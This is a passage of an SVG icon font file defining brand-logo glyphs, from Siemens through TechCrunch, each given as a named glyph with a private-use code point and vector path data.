<glyph glyph-name="brand-siemens" horiz-adv-x="1000" unicode="&#xe932;" d="M3 276v30c17-5 32-8 45-8 18 0 27 5 27 14 0 4-2 7-4 9-3 3-10 6-21 11-19 8-32 15-38 20-8 8-12 17-12 29 0 15 6 26 17 34 11 8 26 12 44 12 10 0 24-2 43-6v-28c-14 5-27 8-39 8-17 0-25-5-25-14 0-3 1-6 5-8 2-2 10-6 23-12 18-8 30-15 36-21 8-7 11-16 11-27 0-17-7-29-21-38-11-7-26-10-44-10-16 0-31 2-47 5z m134 148h42v-150h-42v150z m81-150v150h107v-27h-67v-34h58v-25h-58v-35h69v-29l-109 0z m143 0v152h55l38-97 39 97h53v-152h-40v108l-45-110h-26l-44 110v-108h-30z m224 0v152h109v-27h-68v-35h59v-25h-59v-36h70v-29h-111z m139 0v152h49l53-102v102h30v-152h-48l-54 103v-103h-30z m162 2v31c17-6 32-9 45-9 19 0 28 5 28 15 0 3-2 6-4 9-3 3-10 6-21 11-20 8-33 15-39 21-8 7-12 17-12 29 0 15 6 27 17 34 11 8 26 12 45 12 10 0 23-1 39-5l4 0v-29c-14 5-27 8-39 8-17 0-26-5-26-14 0-4 2-6 5-9 3-1 11-5 24-11 18-8 31-15 37-22 7-7 11-16 11-27v-1c0-17-7-29-21-37-12-7-27-11-46-11-15 0-31 2-47 5z" />
<glyph glyph-name="brand-sk-telecom" horiz-adv-x="1000" unicode="&#xe933;" d="M223 348c-4 24-16 46-24 70-9 25-21 51-24 77-6 70 34 112 97 143-78 52-156 90-242 111-24 5-32-1-30-24 1-10 2-21 3-32 9-78 17-157 26-236 9-82 18-164 29-246 1-9 14-22 22-22 82-3 156 78 143 159z m755-130c-19 18-40 33-59 51-16 15-31 15-51 5-69-38-144-59-224-55-12 0-23 0-35 0-65 1-81-15-85-80-3-58-3-116-35-168-3-5-3-15 0-19 3-3 13-4 18-2 13 5 26 11 39 17 141 66 282 132 424 198 38 18 39 23 8 53z m-388 31c12 0 23-2 35-3 85-2 164 15 242 63-123 72-247 118-385 118-53 58-105 117-158 175-7 7-22 10-32 8-60-13-98-77-80-136 8-28 22-55 32-83 23-65 16-125-37-175-2-2-4-6-4-7 72-24 113 12 152 67 36 51 81 97 122 146-28-82-56-163-84-245-3-10-7-25-3-33 25-46 52-91 80-140 4 12 10 22 12 33 5 41 10 82 13 123 4 63 32 90 95 89z" />
<glyph glyph-name="brand-slideshare" horiz-adv-x="1000" unicode="&#xe934;" d="M985 458c-38-73-118-96-196-137v-158c0-22-29-152-138-152-110 0-146 63-146 89v146c-11 3-21 7-32 12v-158c0-26-40-63-94-63s-158 76-158 126v171s-144 57-177 98c-34 41-51 57-41 81 9 24 117-67 180-81 63-15 172-23 219-21s72-17 98-41c2-1 3-3 5-4v18c0 23 59 32 95 32h157c19 0 163 47 196 84 34 38 68 27 32-42z m-333 10c61 0 111 49 111 110s-50 111-111 111-110-49-110-111c0-61 49-110 110-110z m-291 0c61 0 111 49 111 110s-50 111-111 111-110-49-110-111c0-61 49-110 110-110z" />
<glyph glyph-name="brand-smashing-magazine" horiz-adv-x="1000" unicode="&#xe935;" d="M527 245c-53 25-108 47-161 72-148 69-243 227-135 416l-158-36c-51-12-82-62-71-112l151-662c12-51 62-82 112-71l66 15v1c-43 20-84 38-128 57 26 62 50 120 76 181 17-9 28-17 40-23 70-39 144-58 224-44 37 6 69 20 80 60 11 42-2 78-33 106-19 16-41 29-63 40z m471-130l-151 662c-12 51-62 82-112 71l-94-22c0 0 0 0 0 0 46-15 85-27 123-42 10-4 34-13 34-13s-47-122-67-179c-74 60-145 76-227 64-35-5-69-29-79-66-11-38 2-68 34-88 23-15 48-28 74-39 50-22 102-40 151-63 121-56 184-150 173-286-3-39-14-86-25-131 1-1 1-1 1-1l94 21c51 12 82 62 71 112z" />
<glyph glyph-name="brand-snapchat" horiz-adv-x="1000" unicode="&#xe936;" d="M1000 100c-3 12-12 15-23 18-90 19-147 78-189 156-21 40-14 57 30 73 22 8 46 14 64 30 23 20 20 46-6 62-16 9-33 10-50 4-10-3-20-8-30-10-19-4-29 1-27 23 3 29 4 58 6 87 0 30-1 61-10 91-29 95-95 155-191 176-110 25-209 4-289-82-62-68-64-152-58-236 4-68 5-68-60-50-25 8-54-2-62-23-11-27 7-42 28-52 21-11 44-18 66-27 21-10 31-27 20-49-39-83-95-146-186-171-13-4-31-2-33-22-1-18 11-28 25-36 25-16 55-22 84-27 19-3 28-9 32-29 8-40 14-45 55-36 63 13 117 1 167-40 31-25 67-41 106-48 65-10 120 12 169 50 38 28 79 48 128 42 17-2 34-4 51-7 21-4 37 3 38 24 3 34 22 43 52 47 28 4 56 13 79 32 9 7 16 17 14 30z m-20-6c-30-26-62-33-93-37-29-4-48-15-50-47-1-18-9-24-28-19-66 14-126 2-182-39-91-68-164-68-255-1-57 42-117 55-184 39-15-4-24-1-25 16-2 35-23 48-56 52-30 3-60 11-87 36 100 22 164 82 209 166 30 57 18 87-44 109-15 5-29 10-43 17-9 5-24 11-17 25 7 12 20 17 35 11 14-5 29-11 44-13 35-5 48 10 47 44-2 41-2 81-3 121-3 94 70 177 148 206 123 46 260 6 324-97 20-31 31-65 31-103 0-43 1-86-4-129-4-31 13-46 44-41 15 2 29 8 44 13 17 6 33 1 39-14 5-13-11-20-22-25-18-8-38-14-56-22-41-18-53-48-33-89 45-90 110-156 217-179z" />
<glyph glyph-name="brand-sony-ericsson" horiz-adv-x="1000" unicode="&#xe937;" d="M504 850c280-2 506-235 496-518-9-267-233-487-509-482-270 5-499 226-491 515 8 270 229 486 504 485z m46-182c20 51 1 90-52 105-27 7-55 9-82 4-89-16-167-53-234-113-47-43-83-93-97-155-11-47 14-91 59-107 26-12 53-16 82-11 40 6 75 24 109 46 68 44 127 100 176 165 16 21 30 42 39 66z m-409-361c-34 17-63 40-87 70-6-22-3-65 3-101 30-177 211-371 476-332 69 10 132 35 188 75 102 71 156 168 159 292 3 75-34 132-99 169-20 13-43 18-66 19-42 2-80-11-116-31-31-16-59-36-88-55-54-36-109-71-169-96-66-27-133-38-201-10z" />
<glyph glyph-name="brand-sony" horiz-adv-x="1000" unicode="&#xe938;" d="M727 432c-32-1-63-1-95-1-2 0-5 0-7 0-2 1-3 0-3-2 0-4 0-8 0-12 0-3 1-3 3-3 9-1 17-1 25-1 8-1 11-3 11-11 1-2 1-4 1-5l-1-72v-4l0 0c-2 2-3 3-5 5-17 21-35 42-53 63-11 13-22 27-33 40-1 2-2 2-5 2-12 0-24 0-36 0-17 0-35 0-53 0-2 0-3 0-3-2 0-4 0-8 0-12 0-2 0-3 3-3 8-1 17-1 26-2 7 0 10-2 10-10v-4l0-86c0-5 1-9 0-13-1-9-4-12-12-12-8-1-16-1-24-1-2 0-3 0-3-3 0-3 0-7 0-10 0-3 1-4 4-4 33 0 65 0 98 0 3 0 7-1 9 0 2 2 0 6 0 9 0 8 0 8-8 8-7 0-14-1-21 0-5 1-8 4-9 9-1 4-1 8-1 12 0 25 0 50 0 76 0 2-1 5 1 8 1-2 3-3 5-5 8-10 17-20 25-30 13-16 26-31 39-47 11-12 20-25 31-36 2-2 3-4 6-4 13 0 27 0 40 0 2 0 3 0 3 3-1 15-1 30-1 45 0 29 0 58 1 87 1 6 3 8 9 9 2 1 4 1 6 1 6 0 12 0 19 0 2 0 3 0 3 3 0 3-1 7 0 10 0 4-2 5-5 5z m-317-17c-24 14-50 20-78 20-19 0-38-3-57-10-18-7-35-17-47-33-20-26-20-62 0-87 11-14 25-23 41-29 31-11 62-14 94-8 20 3 39 10 56 22 25 19 34 45 28 75-4 22-18 38-37 50z m-15-84c-4-20-16-34-35-42-18-7-37-8-55-1-23 8-35 26-39 49-2 13-2 25 2 37 7 23 25 35 48 40 5 1 11 2 15 2 13 0 23-2 33-6 15-6 23-18 28-32 5-16 7-31 3-47z m-246 28c-22 8-45 10-67 14-11 1-23 2-33 8-10 4-12 15-5 23 5 6 12 8 19 10 20 4 39 2 58-7 11-4 20-12 25-22 2-4 4-8 5-13 0-1 1-2 3-2 6 0 12 0 18 0 2 0 3 0 3 2v57c0 2-1 3-2 3-6-1-13 1-18-1-5-1-6-7-9-11-1-2-2-3-4-1-6 3-13 7-19 9-22 8-45 9-68 6-14-3-28-7-39-17-11-8-16-19-16-33 1-16 9-27 23-34 9-4 18-6 26-7l69-12c9-2 18-4 26-9 9-7 10-19 1-27-5-4-11-6-17-7-16-3-33-3-49 1-8 2-16 5-24 9-14 8-23 20-26 36-1 3-2 5-6 4-5 0-10 0-16 0-2 0-3-1-3-3 0-11 0-21 0-32v-31c0-2 1-3 3-3 6 0 12 0 18 0 2 0 3 0 4 2 2 4 4 8 5 12 2 2 3 3 5 1 8-6 17-11 27-14 22-6 43-7 65-3 14 2 28 6 40 14 20 14 23 44 7 61-9 9-18 14-29 17z m851 58c0 3 0 7 0 10 0 4-1 5-4 4-18 0-35 0-53 0-16 0-32 0-48 1-3 0-4-1-4-4 0-4 0-7 0-11 0-2 1-3 3-3 7 0 14 0 21 0 2 0 4-1 6-2 3-1 4-2 2-5-1-2-2-4-4-6-6-10-15-17-23-26-4-4-8-8-12-12-2-2-3-1-4 0-2 3-5 5-8 8-9 10-19 20-28 30-2 2-5 5-3 8 1 4 5 4 8 4 8 1 16 1 24 1 3 0 5 0 4 4 0 3 0 6 0 9 1 4-1 4-4 4-29 0-58 0-87 0-10 0-20 0-30 0-3 0-3 0-3-3 0-4 0-8 0-12 0-2 0-2 2-2 3 0 6 0 9 0 11-1 21-4 28-13 2-3 5-5 8-8l53-51c2-1 3-3 3-6 0-13 0-26 0-40-1-5-3-8-8-9-4-1-8-1-13-1-7 0-14 1-20 0-3 0-4-1-3-3 0-4 0-7 0-11-1-3 0-3 3-3 21 0 43 0 64 0v0c21 0 42 0 63-1 3 0 4 1 4 4 0 3 0 7 0 10 0 3-1 4-4 4-4 0-8 0-12 0-5 0-11 0-16 0-10 0-13 6-13 14 0 12 0 24 0 36 0 2 0 4 2 6 8 8 15 16 23 23 12 12 22 25 35 36 6 6 12 11 21 12 5 0 10 0 15 0 2 1 3 2 3 4z" />
<glyph glyph-name="brand-soundcloud" horiz-adv-x="1000" unicode="&#xe939;" d="M0 250c0-34 15-64 40-85v169c-25-20-40-51-40-84z m82 106v-213c10-3 20-4 31-4h11v221c-4 0-8 0-11 0-11 1-21-1-31-4z m92-14c-3 2-5 4-9 5v-208h42v279c-16-22-28-48-33-76z m75 115v-318h42v339c-15-5-29-12-42-21z m84 29v-347h42v346c-8 1-17 2-26 2-6 0-11 0-16-1z m107-24c-13 8-28 14-44 19v-342h63v348c-7-8-13-16-19-25z m40 46v-369h398v0c84 6 122 58 122 121 0 67-51 122-119 122-17 0-32-4-47-10-11 106-101 189-213 189-54 0-103-20-141-53z" />
<glyph glyph-name="brand-sprint" horiz-adv-x="1000" unicode="&#xe93a;" d="M205 370c-21 0-37-11-44-28h-1c1 7 2 18 2 25h-28v-195h29v59c7-1 13-1 21-1 45 0 70 28 70 76 1 41-17 64-49 64z m-20-117c-9 0-15 0-22 2v42c0 23 12 49 34 49 18 0 27-15 27-43 0-36-16-50-39-50z m163 88z m-317 27c0 15 12 26 35 26 11 0 23-2 33-5l2 26c-11 2-22 4-33 4-43 0-68-22-68-54 0-60 81-43 81-82 0-20-17-29-37-29-13 0-28 3-38 7l-2-28c11-3 24-4 37-4 44 0 71 24 71 58 0 58-81 44-81 81z m719-160c57 40 141 115 169 156 7 9 12 15 12 25 0 16-19 28-33 37-33-78-107-175-148-218z m46 256c-5 21-23 44-40 51 22-63 41-153 46-196 8 49 3 108-6 145z m-2-195c40 51 71 112 71 155 0 22-16 38-37 50 0-47-16-157-34-205z m-489 68h-1c2 11 3 23 3 30h-28v-135h29v55c0 40 13 59 40 54l2 29c-26 2-39-14-45-33z m321-57v65h35v22h-36v51l-29-7v-44h-26v-22h26v-74c0-31 9-42 38-42 9 0 19 1 27 3v24c-5-1-12-2-18-2-13 0-17 5-17 26z m332 95c-74-77-221-192-295-232 94 31 229 104 323 169 8 5 14 10 14 19 0 15-28 36-42 44z m-297 182c42-46 103-137 125-169-17 47-61 145-125 169z m-148-187c-23 0-39-12-47-29l0 0c1 7 2 19 2 26h-28v-135h29v65c0 27 15 49 35 49 16 0 21-10 21-27v-87h28v95c1 24-9 43-40 43z m-138-3h29v-135h-29z m15 57c-10 0-19-8-19-18 0-10 9-18 19-18 10 0 19 8 19 18 0 10-9 18-19 18z" />
<glyph glyph-name="brand-squidoo" horiz-adv-x="1000" unicode="&#xe93b;" d="M867 55c-13-44-55-70-92-58-38 11-58 55-45 99s54 70 92 58c38-11 58-56 45-99z m-160-203c-93 10-162 89-178 179-11 56 1 98-36 112-65 24-150-19-233-9-75 9-131 66-134 161-2 87 62 206-26 246 37-8 68-16 85-49 35-71-21-208 40-246 30-19 83-10 120-5 43 6 72 19 112 18-23 32-60 39-85 58-30 23-74 64-94 103-35 69-29 193-80 238-39 34-104 35-170 22 46 39 162 45 206 13 58-42 46-161 98-223 24-28 59-39 85-50 30-12 62-23 107-27 34 148-81 169-152 233-53 48-88 105-80 224 11-62 23-113 67-148 29-23 70-31 102-49 78-44 149-116 170-224 17 10 29 33 45 54 15 21 35 38 36 67 1 41-28 74-54 94-62 49-176 37-152 170 11-33 14-70 40-89 39-28 99-28 143-54 40-23 99-75 99-143-1-78-78-108-45-197 77-21 116-23 156-58 159-139 43-448-192-421z m215 184c30 102-17 207-106 233s-185-34-215-136c-31-102 17-207 105-233 89-27 185 34 216 136z" />
<glyph glyph-name="brand-starbucks" horiz-adv-x="1000" unicode="&#xe93c;" d="M969 172c0 1 0 1 0 0z m0 0v0l0 0 0-1c0 1 0 1 0 1z m-12 154c-17 5-33 13-49 20-19 9-37 18-59 19-2 0-5 2-6 4-4 8-7 16-11 25 5 1 8 2 10 2 21 4 38-3 56-12 14-8 28-16 43-22 19-8 37-7 54 5 2 2 5 6 5 9-1 10-2 21-3 32-8 68-28 132-62 192-47 80-112 141-191 187-82 49-173 66-268 63-82-4-158-26-229-68-95-56-163-136-206-237-23-52-36-107-41-164-1-9 3-14 12-18 21-8 41-4 60 5 15 7 30 15 45 22 13 6 26 9 41 8 9-1 11-5 7-14-1-2-3-4-4-7-2-11-10-12-19-13-8-2-17-4-25-7-17-7-32-16-49-24-18-7-36-11-56-7-4 1-7 2-11 3 1-12 3-22 2-33 0-9 5-11 13-12 18-2 34 3 50 11 14 7 29 14 44 20 9 3 19 3 32 5-3-11-4-20-7-28 0-2-4-5-7-6-15-6-31-10-45-17-23-11-44-26-72-25 3-10 6-20 8-29 1-5 3-7 7-6 10 2 21 4 30 8 12 5 23 13 34 18 11 4 22 6 33 8 1 1 6-2 6-4 0-7 0-14-1-20 0-2-3-4-5-5-11-4-22-7-32-12-19-11-36-24-59-27 0-3 0-6 0-8 3-26 13-31 36-18 11 6 21 14 33 19 6 4 14 6 22 7 2 0 8-3 9-6 1-7 2-15 2-23 0-1-3-1-4-2-11-4-22-7-32-12-12-7-24-15-36-23 2-6 4-12 8-18 5-9 9-10 18-5 18 10 34 23 56 24-2 10-3 20-4 30 22-1 29 0 42 8 10 7 21 15 31 23 2 2 3 4 3 7 5 13 7 27 14 39 10 20 21 40 33 59 13 20 15 41 12 63-4 19-8 39-12 59-8 40 2 76 25 109 5 7 12 13 22 15-1-1-1-3-2-3-18-25-25-52-25-82 0-29 6-56 16-83 9-23 8-45-4-66-9-16-20-31-29-47-8-15-17-30-21-46-8-26 0-51 12-75 4-7 8-14 12-21-16-13-31-25-48-36-8-6-18-11-28-14-23-7-27-5-35 18-3 10-5 11-16 10-18-3-32-14-47-23 7-8 12-15 18-22 3-4 5-4 9-2 7 4 13 9 21 11 6 2 14 2 21 1 6-1 13-11 12-17-1-8-8-7-13-9-6-1-13-2-18-5-9-3-10-6-4-13 2-3 5-5 7-7 13-13 13-12 29-5 4 1 7 3 10 3 4-1 8-2 11-4 4-3 6-8 8-11 3-4 3-7-2-10-5-2-10-6-15-9 15-15 30-27 48-35 7 13 13 25 20 37 7 12 15 23 22 35 8 13 14 27 15 42 0 8 2 15 3 22 4-2 5-4 6-6 9-19 8-37-2-54-9-15-18-28-27-43-8-12-16-25-17-41 0-3 1-6 3-8 7-4 15-9 24-14 0 26 11 46 23 65 10 15 20 31 29 47 10 19 9 39-2 58-6 12-13 22-21 33-10 14-21 26-30 40-15 24-17 50-5 76 10 18 22 36 35 52 20 24 27 51 18 81-6 18-12 37-18 55-7 20-11 40-6 61 5 17 11 35 19 51 6 12 17 21 26 32 3 3 7 4 11 6-1-3-2-6-4-8-26-36-38-77-29-122 4-20 15-38 23-57 15-33 14-63-9-92-11-14-22-30-31-45-22-38-19-72 8-105 10-13 20-25 30-37 11-15 17-30 17-48 0-21-6-41-17-58-10-16-20-32-29-48-7-13-9-27-7-42 0-3 1-8 3-8 10-4 20-7 32-11-8 30 0 55 14 79 8 13 16 26 23 39 21 39 19 75-10 109-10 12-20 24-29 37-20 29-22 59-4 89 9 16 20 31 31 45 14 20 20 42 14 65-5 20-13 39-21 58-10 25-18 50-15 78 3 35 16 65 45 87 3 2 6 3 9 5-4-8-9-14-13-21-7-13-14-25-18-39-10-31-3-62 9-91 8-22 18-44 27-67 8-20 7-39-2-58-5-10-10-19-16-28-7-12-15-23-22-35-16-30-16-59 6-86 8-10 16-20 24-30 30-37 35-77 12-119-8-14-16-29-24-44-8-16-14-32-12-50 4-35 0-37 38-38 0 0 1 1 2 1-18 36-7 69 9 102 9 19 19 37 27 57 11 26 8 51-7 74-4 6-9 12-13 18-12 16-24 32-35 49-11 16-12 35-3 53 7 12 15 24 22 36 7 11 15 23 20 35 8 19 14 23 32 16 18-7 36-7 54-1 6 2 13 3 20 3 6 0 11-3 14-9 6-11 12-23 19-33 8-13 18-24 25-36 12-19 13-39 4-58-8-15-18-29-28-44-10-13-21-26-29-41-12-21-12-43-1-65 9-16 18-33 26-50 17-34 28-69 11-108 11 3 21 5 30 7 3 1 5 4 6 7 5 16 6 32 2 48-5 23-17 42-28 63-6 12-14 24-18 38-9 24-2 48 12 69 11 18 25 34 37 52 6 9 12 18 15 28 6 22-1 43-13 62-9 16-21 30-30 46-5 8-9 17-12 27-5 22 2 42 11 62 9 19 19 38 25 57 18 51 9 98-26 139l-4 5c4 0 7-1 9-3 41-33 57-74 46-125-5-23-15-45-22-68-3-11-6-21-10-32-7-22-3-43 10-62 10-14 20-26 30-40 9-12 16-26 17-42 3-22-5-41-18-58-11-16-23-31-35-47-20-26-23-54-9-84 8-17 19-33 28-49 9-17 18-33 19-52 1-9 1-19 1-29 7 3 16 6 24 8 5 2 6 4 7 9 2 20-4 38-13 54-10 16-20 31-29 46-9 14-13 29-12 45 1 18 8 35 19 50 11 17 24 33 36 50 5 9 9 18 12 28 6 25-3 47-15 68-12 19-24 38-37 57-8 12-12 26-9 40 2 14 6 27 11 40 4 13 12 24 16 37 14 51 5 98-25 141l-4 6 2 3c8-7 17-13 23-21 26-34 39-71 29-114-6-26-14-52-22-78-4-16-3-31 3-46 5-11 11-21 17-30 9-14 20-28 29-42 17-28 17-56 0-84-12-19-24-37-38-54-25-30-28-53-9-87 8-15 17-28 25-42 11-18 21-37 22-60 7 3 13 5 19 8 6 3 9 8 6 15-4 9-6 19-11 28-8 14-17 27-26 40-13 17-15 36-13 56 1 6 4 12 6 18 1 0 3 0 4-1 0-2 0-4 1-7 3-14 3-29 9-41 16-30 34-59 51-89 16 10 33 19 47 34-6 3-10 6-15 9-7 4-8 7-4 14l6 8c3 5 7 5 12 3 6-3 13-5 20-7 2-1 5-1 6 0 9 7 18 14 24 26-12 5-22 9-32 13-2 1-5 3-6 4-2 9 9 21 18 19 12-3 24-8 37-12 2-1 7-2 8 0 7 7 13 15 19 24-17 9-33 16-48 24-7 3-12 1-15-6-2-6-4-12-6-18-3-7-7-11-15-8-11 4-24 6-34 12-17 11-33 25-49 37-2 2-3 7-2 9 4 8 8 16 12 24 9 15 12 32 11 49-2 22-11 41-23 59l-31 50c-7 11-11 24-9 37 3 18 8 36 12 54 6 23 11 47 9 71-3 24-12 45-22 66-1 3-3 6-5 11 13-8 24-15 30-27 21-45 27-92 9-140-10-27-9-53 6-78 8-15 19-28 27-43 8-14 16-29 19-44 3-15 10-25 21-33 2-1 3-2 4-3 15-13 31-23 53-18-1-11-3-21-4-32 17 0 31-8 46-16 5-3 11-6 17-9 2 0 6 0 7 1 4 7 9 14 12 21 1 2-1 6-2 7-25 10-44 32-73 34 1 6 2 11 3 16 3 12 3 13 15 10 6-1 12-3 18-6 9-4 18-9 26-14 30-15 32-19 44 19-16 8-30 14-44 21-17 8-34 15-50 23-2 1-4 3-4 4-1 6-1 12 0 17 0 6 3 9 9 7 13-4 26-8 38-13 17-8 33-16 50-23 9-4 14-1 16 9 2 8 2 17 3 23-15 6-29 10-43 15-10 4-19 10-28 16-14 8-29 15-46 16-2 1-5 2-5 4-2 8-4 17-5 26 16 3 30 0 43-6 14-6 27-13 40-19 15-7 31-11 47-8 3 1 7 4 7 7 2 12 3 25 3 35-15 1-30-2-43 1z m-686 193c-30-20-53-46-75-75-2-3-5-6-8-5-29 4-56-6-82-18-12-5-23-12-35-16-17-6-35-7-52 4 8 13 16 25 23 37 19 28 37 55 48 87 7 22 10 44 8 67-1 4 1 8 1 13 5-2 11-2 15-5 23-17 37-41 43-70 1-5 2-10 3-17 8 3 16 6 23 9 22 8 43 15 66 14 13 0 26-3 38-12-6-5-11-10-16-13z m147-25c14 2 28-1 38-11 2-2 3-6 5-8l-2-2-23 5c-7 2-14 0-20-5-5-5-9-3-11 4-2 11 2 16 13 17z m178 26c1-2 0-5 1-8-17 0-32 0-47 0-5 0-9-2-13-3-16-5-24-14-25-31-1-11 0-22 2-32 0-3 3-7 6-8 2-1 6 3 8 5 5 10 11 11 21 8 11-3 23-4 34 1 6 3 10-1 11-6 2-6 4-13 3-19-5-31-15-61-36-85-6-7-12-12-19-17-26-20-61-20-87 0-36 28-55 65-55 111 0 5 2 9 5 13 2 5 8 7 13 4 8-5 17-5 25-3 9 2 19 4 28-1 1-1 6 0 6 2 3 5 5 11 5 17 0 8-1 17-3 26 0 3-2 6-5 8-8 8-18 11-28 11-9 1-18 1-28 0-9 0-13 5-8 14 8 17 21 29 39 37 24 9 48 10 73 7 15-2 30-7 43-13 17-7 26-21 31-38z m-3-47c0-1-6-1-9 0-14 5-28 9-43 0-2 7-3 12 3 14 13 5 27 9 41 5 3-1 7-3 8-6 2-4 1-9 0-13z m113 130c-8-17-13-35-20-54-57 24-118 44-184 43-66-1-128-18-187-46-6 19-12 37-20 54-8 17-18 33-29 51 29 3 52-12 78-21 2 25-12 44-21 68 7-1 14 0 19-2 18-7 35-15 53-24 12-7 24-15 38-23 4 7 8 13 11 21 5 11 8 23 11 35 1 2-1 7-3 9-12 11-25 22-37 34-2 2-4 4-7 9 13 1 23 1 33 2 10 1 22-2 30 3 7 5 9 18 14 27 4 10 9 20 13 30l4 0c5-12 12-24 16-37 4-16 12-23 29-21 14 1 27-2 43-3-3-4-4-8-7-10-12-11-24-23-36-34-4-4-5-6-2-11 7-17 14-34 21-51 28 16 54 35 86 44 6 1 12 2 19 3 1 0 2 0 4 0-4-23-19-42-18-66 26 7 48 22 77 21-10-18-20-34-28-51z m109-166c-3 0-7 2-8 4-24 35-52 65-89 86 0 0-1 1-1 1 1 9 8 11 15 13 26 6 52 2 76-8 11-4 21-9 32-14 3 11 5 22 9 32 7 26 23 46 46 59 3 1 8 2 9 1 3-2 5-7 4-10-8-44 5-82 27-118 13-20 26-40 39-60 2-4 5-8 8-13-13-10-28-12-43-8-13 4-26 9-37 16-27 15-56 22-87 19z m-320 235c-15-11-29-22-43-32 2-8 6-9 12-9 25 1 50 1 75 2 3 0 5 2 8 3l0 3c-15 11-31 22-47 33-1 1-4 1-5 0z m-3-322c18-3 35 8 47 29h-79c1-7 22-27 32-29z m-8 66c-4-1-8-3-13-5 18-12 33-13 51 0-6 2-10 4-15 5-7 0-15 0-23 0z" />
<glyph glyph-name="brand-stc" horiz-adv-x="1000" unicode="&#xe93d;" d="M248 387h-164c-17 0-31 14-31 31s14 32 31 32h226v53h-226c-46 0-84-38-84-85 0-46 38-84 84-84l164 0c23 0 42-18 42-41 0-23-19-42-42-42h-242v-53h242c53 0 95 42 95 95 0 52-42 94-95 94z m117 63h121v-252h53v252h120v53h-294v-53z m463-1h172v54h-172c-45 0-154-20-154-153 0-133 109-152 154-152h172v53h-172c-29 0-101 19-101 99s72 99 101 99z" />
<glyph glyph-name="brand-steam" horiz-adv-x="1000" unicode="&#xe93e;" d="M925 477c0-51-41-92-92-92s-93 41-93 92 42 93 93 93c51 0 92-42 92-93z m-37-155l-112-96c1-7 2-15 2-23 0-81-66-147-148-147-70 0-129 49-144 114l-277 94c-22-17-49-27-79-27-72 0-130 59-130 130s58 130 130 130c62 0 114-43 127-100l268-91c26 26 62 43 102 44l40 121c0 3 0 5 0 7 0 92 74 167 166 167s167-75 167-167c0-72-47-134-112-156z m-676 90c-15 28-45 47-79 47-51 0-92-41-92-91s41-91 92-91c9 0 18 1 26 4l-43 14c-35 19-48 62-29 97 18 35 62 48 97 29l28-9z m491 66c0-71 58-129 130-129s129 58 129 129-58 129-129 129-130-58-130-129z m3-288c0 55-44 98-99 98-7 0-15 0-22-2l55-19c35-18 48-62 30-97-19-34-63-47-98-29l-59 20c12-40 50-69 94-69 55 0 99 44 99 98z" />
<glyph glyph-name="brand-suzuki" horiz-adv-x="1000" unicode="&#xe93f;" d="M605 90s-60 45-223 150c-164 104-368-41-368-41l484-344c213 225 485 306 485 306l-1 0-619 434c9 30 32 15 32 15s60-45 223-150l368 41-485 344c-212-225-484-306-484-306l1 0 619-434c-9-30-32-15-32-15z" />
<glyph glyph-name="brand-symbian" horiz-adv-x="1000" unicode="&#xe940;" d="M603 210c-3-93-8-191-40-284-7-21-16-40-29-57-22-26-47-25-68 2-21 27-32 59-39 92-40 182-42 364 11 544 6 21 17 39 30 56 20 25 42 25 64 1 15-17 25-39 32-61 7-26 15-52 20-78 14-70 18-140 19-215z m-107 455c-50 1-89 43-87 95 2 49 44 90 92 90 52 0 95-43 93-94-1-43-29-94-98-91z" />
<glyph glyph-name="brand-t-mobile" horiz-adv-x="1000" unicode="&#xe941;" d="M713-99c-10 0-20 0-29 2-68 7-93 34-99 102-2 14-5 28-5 41 0 243 1 487 0 730 0 30 11 36 38 33 112-14 187-75 224-181 15-41 23-86 34-132 13 2 27 5 32 6 0 110 0 213 0 316 1 24-8 32-32 32-247-1-494-1-741 0-27 0-35-9-35-34-2-93-4-186-8-279-2-36 16-41 46-38 3 20 6 38 9 56 23 139 101 227 221 250 59 11 62 9 62-50 1-229 1-457 0-686 0-32-4-64-9-96-6-34-29-55-61-63-19-5-40-5-59-9-17-4-44 6-44-26 0-33 26-24 44-24 139-1 278-1 417 0 10 0 19 1 29 2 12 34-1 48-34 48z m-424 309c2 52 1 104 0 156 0 7-11 19-16 19-60 2-119 1-179 1v-196c59 0 117-1 175 0 7 1 20 13 20 20z m444 175c-7 0-20-12-20-19-1-52-1-104 0-156 1-7 11-19 17-20 59-1 118 0 178 0v196c-59 0-117 1-175-1z" />
<glyph glyph-name="brand-tango" horiz-adv-x="1000" unicode="&#xe942;" d="M603-115c-80-34-155-44-234-28-36 8-55 26-54 60 4 118 5 235 14 352 9 119 26 237 39 356 1 6 0 13 0 18-52 0-101-2-150 0-37 2-74 4-110 12-81 17-109 73-78 149 6 15 16 30 25 46 143-54 287-24 431-19 135 4 272 19 406-13 41-9 78-26 88-70 10-45-18-79-46-109-6-7-24-9-33-6-91 41-186 30-281 25-26-2-38-13-41-42-12-125-31-250-39-376-8-120-5-242 63-355z" />
<glyph glyph-name="brand-target" horiz-adv-x="1000" unicode="&#xe943;" d="M502 72c215 0 390 174 390 389 0 215-175 389-390 389s-389-174-389-389c0-215 174-389 389-389z m0 649c144 0 260-116 260-260s-116-260-260-260-260 116-260 260c1 144 117 260 260 260z m0-394c74 0 134 60 134 134 0 74-60 133-134 133s-133-59-133-133c0-74 60-134 133-134z m-277-330h-118v-27h43v-117h32v117h43z m40 0l-54-144h32l11 32h54l10-32h33l-54 144h-32z m-3-88l19 52h0l18-52h-37z m198 12v0c16 7 23 19 23 36 0 22-17 40-42 40h-77v-144h31v56h31c16 0 22-6 24-21 2-12 1-26 5-35h32c-6 8-6 25-6 34-1 15-6 30-21 34z m-30 11h-35v40h35c14 0 22-6 22-20 0-14-8-20-22-20z m141-25h32c-2-20-14-31-34-31-29 0-39 24-39 48 0 25 10 49 39 49 14 0 26-8 30-24h30c-3 33-31 51-60 51-44 0-71-33-71-76 0-41 26-74 71-74 14 0 28 5 39 20l3-17h20v78h-60v-24z m113 8h69v25h-69v30h76v27h-107v-144h108v27h-77z m91 82v-27h43v-117h32v117h43v27z" />
<glyph glyph-name="brand-tata-indicom" horiz-adv-x="1000" unicode="&#xe944;" d="M625 848c-219 8-398-166-403-380-5-214 165-393 379-399 211-5 398 163 399 390 0 210-167 381-375 389z m-14-568c-91-1-179 72-179 179 0 108 88 180 180 179 97-1 178-78 178-179 0-109-90-181-179-179z m-454-114c-86 1-158-71-157-158 0-77 62-156 158-156 86 1 156 69 156 157 0 91-75 158-157 157z m0-216c-37 1-59 30-59 60 0 32 28 59 60 58 31 0 58-27 58-58 0-32-25-60-59-60z" />
<glyph glyph-name="brand-techcrunch" horiz-adv-x="1000" unicode="&#xe945;" d="M0 600v-167h167v-333h166v333h167v167h-500z m667 0h333v-167h-333v167z m-167-167v-333h500v167h-333v166h-167z" />
